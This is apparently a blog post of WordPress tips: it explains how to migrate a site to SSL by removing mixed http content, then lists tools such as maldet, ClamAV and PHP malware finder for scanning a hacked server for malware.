Migrating your WordPress site to SSL

There are two steps to migrating your WordPress site over to SSL (https instead of http) after you have set up your certificate and web server configuration.

The first is relatively easy: update your Settings > General and change the WordPress Address (URL) and Site Address (URL) from http to https.

The second, part is a bit trickier.

Basically for SSL to work correctly you want to avoid mix-mode content. This is where content is being served both via http (non-SSL) and https (SSL). When this happens your browser won’t show the site as being 100% SSL, and instead display different messages depending on your browser. Its enough to deter users from using the site if they are expecting the “green” secure padlock.

To fix this, you need to find and replace references to non-SSL content (hardcoded with http://) in two places — your code and your database.

For your code, the first place to check is your theme code and settings. Look for and replace any instances of http:// with https://

You can use your browser’s debugging/inspector to check for files that are not loading via https://. Note too these might be external resources and scripts (e.g. external Javascript libraries, Google fonts etc). This can also be an issue in plugins, particularly when authors start hardcoding the absolute URL with http://.

For your database, use a tool like Better Search & Replace to search your WordPress site for references to http://<yoursite>.com and replace it with https://<yoursite>.com.

Scanning Your Server for Malware

If you’ve been unfortunate enough to be targetted by hackers who have added malware to your web server, here are a few Linux CLI tools you can use to troubleshoot.

The first is maldet which can be paired with Clam Antivirus to scan for malware. Here’s a good guide on how to do that.

Note you can install maldet via tools like yum or apt usually too. The key is to make sure it is running together with ClamAV which you should keep up to date. You can also get it to alert you and automatically quarantine suspicious files.

Another tool, which is much better at finding hacked PHP code (which is usually encoded) is PHP malware finder. You’ll notice that hacked PHP files aren’t plain PHP code, but have instead be encoded (e.g. base64) to make them unreadable without decoding.

This can be cloned to the server and run from the CLI with PHP. Just a note it will pick up a lot of positives depending on your app (e.g. WordPress) and you’ll need to work through these yourself.

Don’t forget to also have something like [All in One WP Security and Firewall] (https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/) installed to lock down your WordPress site and also to scan for and alert you of any changes.

As a final measure, it helps if your application code is kept under version control on the server using a tool like git. This helps to see any untracked or modified files which you can then investigate and quarantine.